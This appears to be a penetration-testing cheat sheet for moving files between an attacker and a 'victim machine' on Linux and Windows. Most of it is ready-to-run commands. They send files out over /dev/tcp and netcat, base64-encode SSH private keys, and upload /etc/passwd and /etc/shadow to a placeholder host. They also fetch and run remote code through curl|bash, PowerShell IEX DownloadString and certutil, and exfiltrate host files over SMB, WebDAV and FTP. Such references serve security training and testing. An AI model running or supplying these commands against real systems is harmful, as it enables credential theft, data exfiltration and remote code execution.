File Transfer Generator

Linux

Windows

Linux Downloads Operations

bash /dev/tcp download

Shell

# Sender
cat < content > /dev/tcp/<IP>/1234

# Receiver
nc -nvlp 4444 --recv-only > content

nc download

Shell

# Sender
nc <IP> 1234 < content

# Receiver
nc -nvlp 1234 > content

Base64 Encoding / Decoding

Shell

# Encoding the target file (it must be short storage file)
cat id_rsa | base64 -w 0; echo

# Decoding the target file
echo -n 'aGVsbG8K=' | base64 -d > id_rsa

Web downloads with wget and curl

Shell

# wget
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

# curl
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless wget and curl downloads (direct execution)

Shell

# curl | bash
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

# wget | python3
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Hello World!

Downloads with SCP

Shell

scp backupjob ubuntu@<IP>:~/

Downloads with FTP

Shell

# Start the ftp server in your machine
python -m pyftpdlib --directory=/home/juan/ftp --port=2121 --user=test --password=test

# Connect to the previous ftp server from the victim machine
ftp <IP> 2121

Name: test
Password: test

Linux Upload Operations

bash /dev/tcp upload

Shell

# Receiver
nc -nvlp 4444 --recv-only > content

# Sender
cat < content > /dev/tcp/<IP>/1234

nc upload

Shell

# Receiver
nc -nvlp 1234 > content

# Sender
nc <IP> 1234 < content

Base64 Encoding / Decoding

Shell

# Encoding the target file (it must be short storage file)
cat id_rsa | base64 -w 0; echo

# Decoding the target file
echo -n 'aGVsbG8=' | base64 -d > id_rsa

Secure Web Upload

Shell

# First create a certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Create directory
mkdir https && cd https

# Start upload server
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

# Upload files
curl -X POST https://<IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

SSH Upload (SCP)

Shell

scp test@<IP>:/root/myroot.txt /your/local/path

Windows Downloads Operations

PowerShell Base64 Encode & Decode

Shell

# Base64 Encoding (Linux)
cat content | base64 -w 0; echo

aGVsbG8=

PowerShell

# Base64 Decoding (PowerShell)
[IO.File]::WriteAllBytes("C:\Users\Public\content",[Convert]::FromBase64String("aGVsbG8=="))

CMD

# Alternatively with cmd
echo RXJlcyBnaWxpcG9sbGFzIHhkCg== > C:\Users\juan\Desktop\content.b64

# Certutil decode
certutil -decode C:\Users\juan\Desktop\content.b64 C:\Users\juan\Desktop\content.txt

PowerShell Web Downloads

PowerShell

# DownloadFile Method
(New-Object Net.WebClient).DownloadFile('https://<IP>/content','C:\Users\Public\Downloads\content')

# DownloadFileAsync Method
(New-Object Net.WebClient).DownloadFileAsync('https://<IP>/content', 'C:\Users\Public\Downloads\content')

# DownloadString - Fileless Method
IEX (New-Object Net.WebClient).DownloadString('https://<IP>/content')

# Alternative Syntax
(New-Object Net.WebClient).DownloadString('https://<IP>/content') | IEX

# Invoke-WebRequest
Invoke-WebRequest https://<IP>/content -OutFile content

Certutil web download

CMD

certutil -URLcache -split -f "http://<IP>/content" c:\windows\temp\nc.exe

File Transfer with SMB

Shell

# SMB Server Setup
sudo impacket-smbserver share -smb2support /tmp/smbshare

# SMB Server with Auth
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

CMD

# Copy from SMB
copy \\<IP>\share\content

# Mount SMB Share with Auth
net use n: \\<IP>\share /user:test test
copy n:\content

File Transfer with FTP

Shell

# FTP Server Setup
sudo python3 -m pyftpdlib --port 21

PowerShell

# PowerShell FTP Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/content', 'C:\Users\Public\content')

CMD

# Cmd FTP Download
echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Windows Upload Operations

PowerShell Base64 Encode & Decode

PowerShell

# Coding the file to base64 using PowerShell
[Convert]::ToBase64String((Get-Content -path "C:\content" -Encoding byte))

Shell

# Decoding the file in our machine
echo aGVsbG8K= | base64 -d > content

PowerShell Web Uploads using Python

Shell

# Making the upload server using Python
python3 -m uploadserver

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

PowerShell

# We can use either PowerShell or browser GUI
IEX(New-Object Net.WebClient).DownloadString('https://<IP>/content')
Invoke-FileUpload -Uri http://<IP>:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373

PowerShell Base64 Web Upload

PowerShell

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\content' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:8000/ -Method POST -Body $b64

SMB Upload using WebDAV

Shell

# Hosting a WebDAV server which will act as SMB share folder
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

CMD

# Upload file to WebDAV share
copy C:\Users\john\Desktop\SourceCode.zip \\<IP>\DavWWWRoot\

FTP Upload

Shell

# Making the ftp server using pyftpdlib
sudo python3 -m pyftpdlib --port 21 --write

PowerShell

# Uploading the target file
(New-Object Net.WebClient).UploadFile('ftp://<IP>/content', 'C:\Windows\System32\drivers\etc\hosts')

CMD

# Alternatively with cmd
echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt